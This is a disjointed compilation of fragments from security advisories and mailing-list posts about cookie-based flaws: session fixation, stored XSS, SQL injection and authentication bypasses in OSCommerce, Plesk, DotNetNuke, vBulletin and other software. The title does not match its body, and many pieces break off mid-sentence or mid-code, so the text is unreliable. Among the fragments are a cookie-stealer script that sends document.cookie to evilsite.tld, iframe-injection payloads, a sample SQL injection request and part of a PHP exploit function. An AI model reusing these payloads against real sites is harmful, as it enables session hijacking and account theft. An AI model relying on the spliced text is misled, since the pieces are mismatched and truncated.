cookies
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Jetty Persistent XSS in Sample Cookies Application
1. *Advisory Information*
There is a flaw in the way OSCommerce handles sessions.
When a client visits an OSCommerce web page, the server sends a cookie. That cookie will be the session cookie for every further request. Thus, once logged in, the cookie will be used to authenticate the user.
When logging in (without cookies), the URL will look something like http://myserver/myapp/index.php?oscid=sometext
An attacker can send a link crafted like this: http://myserver/myapp/index.php?oscid=arbitrarysession. If the admin/user follows the link and logs in, his cookie will still be arbitrarysession. Thus, the attacker can hijack the session because he set the cookie.
P.S. Thanks to the whole TeaM Random (www.etsmtl.ca) for this bug.
Firstname: "><iframe src="//intern0t.net
Lastname: "></iframe> </
- Should work in all browsers as well. (tested in FireFox)
The following is an example of how a cookie stealer will work in conjunction with the exploit:
<script>document.location=%22http://evilsite.tld/cookiestealer.php?cookie=%22 %2B document.cookie;</script>
- The reason "browser-hex" (URL encoding) is used is that the above would otherwise raise an error and thereby not work.
-- Reference about url encoding: http://www.blooberry.com/indexdot/html/topics/urlencoding.htm
CookieLogger:
A SQL injection vulnerability exists in the Plesk application. Please
see the following:
SQL Injection Page 1: "login.php3"
SQL Injection Page 2: "auth.php3"
SQL Injection Cookie Parameter: "PLESKSESSID"
Example: (Will extract the database user)
1) Delay=5224.3877
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
III - SESSION FIXATION
In a session fixation attack, the attacker has to set
the victim's session id. In our case, the attacker fixes
the user's session id; the victim, who is logged in,
will get logged out when the cookie is set, and then,
if the victim tries to log in, the session id will be
registered on the server. Let's see a part of the
logged_in() function:
function logged_in ( $redirect_to_login, $redirect_to_setup ) {
===========================================================
3. Proof-of-Concept Exploit
===========================================================
This vulnerability is trivially exploited against any DNN installation using the default ValidationKey and DecryptionKey values. In order to exploit this issue, two forged cookies (named “.DOTNETNUKE” and “portalroles”) must be generated. The “.DOTNETNUKE” cookie is used by the ASP.NET Forms Authentication Provider to identify the authenticated user, while the “portalroles” cookie is used by DNN to store role memberships for the current authenticated user.
The following C# code excerpt, when run from an ASP.NET web form configured to use the default ValidationKey and DecryptionKey values, can be used to generate the two FormsAuthenticationTicket values required to exploit this issue:
// Step 1: Generate the two FormsAuthenticationTickets
security controls in modern browsers when communication
occurs between two domains that resolve to the same IP
address. This advisory includes a Proof-of-Concept
(PoC) demo and a Java Applet source code, which
demonstrates how this security can be exploited to leak
cookie information to an unauthorised domain, which
resides on the same host IP address.
+------------+
|Exploitation|
+------------+
function "parse_clean_globals()". Let's see the content
of the file "sources/ipsclass.php":
$this->clean_globals( $_GET );
$this->clean_globals( $_POST );
$this->clean_globals( $_COOKIE );
$this->clean_globals( $_REQUEST );
This function will replace special characters, such as
the null byte and "../" (this replacement can be
easily bypassed, as we'll see later), by their
Sample HTTP Request:
GET /cubecart_4/index.php?_a=viewCat&searchStr='&Submit=Go HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;
ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
Pessimism is understandable; I don't fault you for that.
> For multi-node, multi-app, websites sharing auth/state/preferences
> across multiple web assets (physical servers and logical "websites")
> this is pretty much a non-starter. Cookies rule here. For a dozen
> different reasons that I can think of.
Well, I'm sure you read this, but digest auth can do SSO too, arguably
better. Whatever wrappers frameworks put around cookies, which are a
very simple primitive, can be wrapped around digest auth too.
'Seo Panel' Cookie-Rendered Persistent XSS Vulnerability (CVE-2010-4331)
Mark Stanislav - mark.stanislav@gmail.com
I. DESCRIPTION
---------------------------------------
A vulnerability exists in 'Seo Panel' page rendering which allows for unfiltered, unencrypted content to be presented to a user through two different cookies.
II. TESTED VERSION
SektionEins GmbH
www.sektioneins.de
-= Security Advisory =-
Advisory: Piwik Cookie Unserialize() Vulnerability
Release Date: 2009/12/09
Last Modified: 2009/12/09
Author: Stefan Esser [stefan.esser[at]sektioneins.de]
Application: Piwik <= 0.4.5
$port = (int)$tmp[1];
}
}
function _s($url, $cmd, $is_post, $request) {
global $_use_proxy, $proxy_host, $proxy_port, $cookie;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
if ($is_post) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n");
Just my two cents, but...
Many mobile providers are implementing caching on their proxies to make
up for the overpopulated state of their networks, and depending on how
the session ID is generated and stored (being a mobile device this is a
bit more complicated than just setting cookies), it wouldn't necessarily
be a routing problem on the network layer, but could be a routing
problem within the application because of cached resources.
If, for example, facebook set the cookie in a non https session, or in
the url or via a redirect to a uniquely generated page name which in
Vulnerability Fixed: 05/05/2009 7.05 pm
Change Propagated: 05/07/2009 3.19 pm
I recently reported a cross-scripting flaw to Google, which is now fixed. The vulnerability existed in Google’s Support Python Script where a malicious url is not sanitized for XSS character ‘ (single quote) before putting inside javascript variable logURL. As a result, it was possible to break the encapsulation of the var declaration and execute arbitrary javascript commands on the main Google.com domain.
The only limitation was the following characters were either filtered out or url encoded - ” (double quote) < > (space) { }. However, this protection could be easily circumvented. I was able to write javascript statements to steal the session cookies [since characters such as ' ; . ( ) / = + were still available] and send it to my evil website. See the example given below.
Your Google.com domain cookie is the central Single Sign-On cookie to all google services. Once anyone gets it, he or she can use it to
1. Steal your emails.
2. Steal your contacts.
Description:
Vanilla is an open-source, standards-compliant, multi-lingual,
fully extensible web based discussion forum. Unfortunately there
are a couple of issues within Vanilla that allow for a malicious
user to steal client based credentials such as cookies. These
issues include both script injection and cross site scripting.
An updated version of Vanilla has been released and users should
upgrade their Vanilla installation as soon as possible.
Administration Console that allows the attacker to gain administrative
access to the server. It is possible to craft such URL that will, when
requested from the server, return a document with arbitrarily chosen HTML
injected. An obvious use for this type of vulnerability is cross-site
scripting that can be used, among other things, for obtaining session
cookies from WebLogic administrators. These cookies, when stolen, provide
the attacker with administrative access to WebLogic Administration
Console, compromising the security of the entire web server.
This vulnerability is exploitable even if the Administration Console is
only being accessed via HTTPS, and even if the Administrative Port is
Authentication Bypass:
There is a serious flaw in the Jamroom authentication mechanism that
allows for an attacker to completely bypass the authentication process
with a specially crafted cookie. The vulnerable code in question can
be found in /includes/jamroom-misc.inc.php @ lines 3667-3681 within
the jrCookie() function
list($user,$hash) = unserialize(stripslashes($_val));
$user = trim(genc('get',$user));
clients and the Trace page in the admin interface can be used to
visualize these log files.
The problem is that they are visualized as HTML and there are no checks
or limitations on their content so a remote attacker can use this bug
for injecting scripts in these files, for example for retrieving the
cookie of the admin and gaining access to the server configuration.
#######################################################################
===========
Where the 'egg.js' script file is:
/-----------
// == XSS - Cookie stealing - vBulletin 3.7.2 PL1 ==
//
// Using the first method described in
// http://www.securityfocus.com/archive/107/308433
//
// To bypass HttpOnly cookie restrictions - Works in IE 6 and lower
* 2.3 branch < 2.3.2.14
-------------------
Vulnerability : Brute force attack
Description :
The IPDiva Mediation server suffers from a cookie exploitation
vulnerability. A lockout mechanism that triggers after a number of bad
login/password attempts exists, based on a cookie. When the cookie is null,
the account is blocked. By modifying the cookie to a value such as 4242,
an unlimited number of connection attempts can be made, since the cookie
is reset when it reaches 2.
Microsoft Windows Internet Explorer 8.0 Beta 2 was designed to stop "Type 1
XSS" attacks. CRLF Injection is also XSS type 1 and is not mitigated by the
filter, though the data in the query string will still be filtered.
This means that if an attacker tries to exploit a CRLF for XSS in the
casual manner, used in this demo:
http://www.linkstofiles.com/crlf.py?url=cookie1%3dvalue1;%0D%0A%0D%0A<html><body>
<script>alert('get it?')</script></body></html>
His attack will fail as "<script>" will be filtered to "<sc#ipt>"
However, an attacker can inject a content-type header and overwrite the
CMS VULNERABILITY:
-->TESTED ON: firefox 3
-->DORK: "Basado en Spirate"
-->CATEGORY: SQL INJECTION VULNERABILITIES / COOKIE STEALING / BLIND SQL INJECTION
-->AFFECT VERSION: <= 2.1
-->Discovered Bug date: 2009-05-10
-->Reported Bug date: 2009-05-10
-->Fixed bug date: N/A
-->Info patch: Not fixed
http://websecuritytool.codeplex.com/. A screenshot of the reporting screen
is also there.
This tool provides pen-testers hot-spot detection for vulnerabilities,
developers quick sanity checks, and auditors PCI compliance auditing. It
looks for issues related to mashups, user-controlled payloads, cookies,
comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information
disclosure, Unicode, and more.
Major Features:
1. Silent and passive detection of security, privacy, and PCI compliance
ManageEngine, the Enterprise IT Management Software division of Zoho
Corporation [1].
The authentication process of ServiceDesk Plus obfuscates user passwords
using a trivial and symmetrical algorithm in JavaScript code with no
secret. Given that user passwords are stored locally in user cookies and
that the JavaScript code to encrypt and decrypt passwords is available in
a .js file, the authentication process of ServiceDesk Plus can be bypassed,
allowing an attacker to obtain the usernames and passwords of registered users.
Additionally, a cross site scripting vulnerability related to search
-------------------------
Affected URL: Multiple, but the main index is as follows: (dates need to be adjusted to be valid)
https://192.168.1.67:9443/explorer_wse/favorites.exe?startDate=2011-10-22&endDate=2011-10-23&action=def
It is possible to gain access to the report section without authentication, by adding a cookie with predefined values.
(This can be done with Cookie-Manager, or various other IE/Firefox plugins which can be used to edit browser cookies)
This gives full access to the report section of the user interface (but not the policy-management section).
The Websense reports contain confidential information such as user data, browsing history, system information, and blocked threats.
option in web app development.
> As more and more app development moves to hardware platforms
> (iAppleStuffs) and social media aka Ad-metadata networks (Facebook,
> Google *.google.com apps, webmail, etc.) cookies are an easy and
> transparent way to fly, that work now, all the time, and have clear
> business drivers behind them for auth tracking (and working now, all
> the time).
>
> Many modern web 2.0 products use cookies for auth = tracking, not auth